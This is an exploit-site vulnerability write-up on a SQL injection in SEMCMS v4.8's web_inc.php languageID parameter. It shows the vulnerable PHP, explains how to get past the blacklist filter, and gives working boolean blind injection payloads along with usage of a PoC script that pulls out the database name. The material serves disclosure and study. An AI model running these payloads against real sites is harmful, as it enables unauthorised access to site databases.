Share
## https://sploitus.com/exploit?id=864585EF-7430-567B-8107-284A1E9D2D55
# Semcms v4.8 web_inc.php SQL Injection



### Introduction to Semcms

SEMCMS is a foreign trade website content management system (CMS) that supports multiple languages.

```
v4.8 Download Link: http://www.sem-cms.com/TradeCmsdown/php/semcms_php_4.8.zip
```

### Vulnerability description

A SQL injection vulnerability exists in SEMCMS v4.8. The vulnerability stems from a lack of validation of externally entered SQL statements in the web_inc.php parameter languageID. An attacker with no credentials can use this vulnerability to execute illegal SQL commands to obtain sensitive data from the database.

### Vulnerability analysis

The vulnerability exists on line 83 of web_inc.php:

```PHP
if (isset($_POST["languageID"])){
    $Language=test_input(verify_str($_POST["languageID"]));
}else{
    $Language=verify_str($Language);
}
```

![ID](./images/ID.png)

The value of $Language is brought into the SQL statement on line 88 to be executed:

```PHP
if(!empty($Language)){
      $query=$db_conn->query("select * from sc_tagandseo where languageID=$Language");
      $row=mysqli_fetch_array($query);
      ......
}
```

![SQL](./images/SQL.png)

verify_str() function mainly uses the blacklist mechanism; test_input() function mainly filters backslashes, single quotes and double quotes, while the SQL statement here doesn't use single quotes and double quotes closure, so we just need to bypass the blacklisting rules to perform SQL injection.

![verify_str](./images/verify_str.png)

![test_input](./images/test_input.png)

Since index.php contains web_inc.php, we can also do SQL injection from index.php.

![index](./images/index.png)

### Vulnerability demonstration

1. Go to the link of the target machine you have built yourself,
Example: http://www.semcms.com/index.php

2. Burpsuite captures packets and constructs SQL injection(Bool) payload:

```mysql
payload: -1 or length(database()) REGEXP char(94,54,36)
```

When the condition is true:

![true1](./images/true1.png)

![true2](./images/true2.png)

```mysql
payload: -1 or length(database()) REGEXP char(94,55,36)
```

When the condition is false:

![false](./images/false.png)

![false2](./images/false2.png)

3. SQL injection using the POC script in this project:

Usage:

```
python poc.py <vuln url>
```

Example:

```
python poc.py http://www.semcms.com/index.php
```

Successfully obtained the database name:

![succ](./images/succ.png)